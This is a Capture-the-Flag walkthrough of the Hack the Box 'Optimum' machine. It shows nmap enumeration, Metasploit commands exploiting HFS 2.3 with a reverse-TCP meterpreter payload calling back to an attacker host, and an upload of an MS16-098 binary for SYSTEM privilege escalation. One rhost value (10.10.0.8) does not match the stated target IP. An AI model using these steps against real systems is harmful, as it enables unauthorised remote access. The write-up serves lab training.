Hack the Box Challenge: Optimum Walkthrough

Hello friends!! Today we are going to solve another CTF challenge “Optimum” which is categories as retired lab presented by Hack the Box for making online penetration practices. Solving challenges in this lab is not that much tough until you don’t have correct knowledge of Penetration testing. Let start and learn how to breach into a network then exploit it for retrieving desired information.

Level: Intermediate

Task: find user.txt and root.txt file in victim’s machine.

Since these labs are online accessible therefore they have static IP. The IP of optimum is 10.10.10.8 so let’s start with nmap port enumeration.

nmap -A 10.10.10.8

From given below image, you can observe that we found ports 80 is open for file sharing using HFS 2.3 in victim’s network.

When I Google for searching any relative exploit I found first link for metasploit exploit.  

Then I run msfconsole command in terminal and load metasploit framework for using rejetto_hfs_exec module for exploiting target machine.

use exploit/windows/http/rejetto_hfs_exec

msf exploit(windows/http/rejetto_hfs_exec) >set payload windows/64/meterpreter/reverse_tcp

msf exploit(windows/http/rejetto_hfs_exec) >set rhost 10.10.0.8

msf exploit(windows/http/rejetto_hfs_exec) >set lhost 10.10.14.6

msf exploit(windows/http/rejetto_hfs_exec) >set svrhost 10.10.14.6

msf exploit(windows/http/rejetto_hfs_exec) >exploit

And it works perfectly, I have own meterpreter session 1 as shown below and by running sysinfo command I came to know about its system information.

Now let’s complete this task my searching user.txt and root.txt flag which is hidden somewhere inside its directories.

Inside c:\Document and Setting \kostas\Desktop I found user.txt file and used cat “file name” command for reading this file.

cat user.txt.txt

Great!! We got our 1^st flag successfully

For getting root flag I really struggle a lot, all privilege escalation exploit suggested by recon/local_exploit_suggester are proved vanish when I try them.  Then I took help from Google for searching exploit related to windows server and found many exploits, between those “MS16-098 exploit 41020” was among them.  I simply downloaded this exe file and go with manual privilege escalation.

After downloading exe file from Google, I transferred it into target’s machine via meterperter session.

Meterpreter> upload /root/Desktop/41020.exe .

Meterpreter> shell

Then after executing whoami command it’s assured me “nt authority\system”

Inside c:\Document and Setting \Administrator\Desktop I found root.txt file and used cat “file name” command for reading this file.

type root.txt

Great!! We got our 2nd flag successfully

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Hack the Box Challenge: Optimum Walkthrough appeared first on Hacking Articles.

from Hacking Articles https://ift.tt/2ERxo4i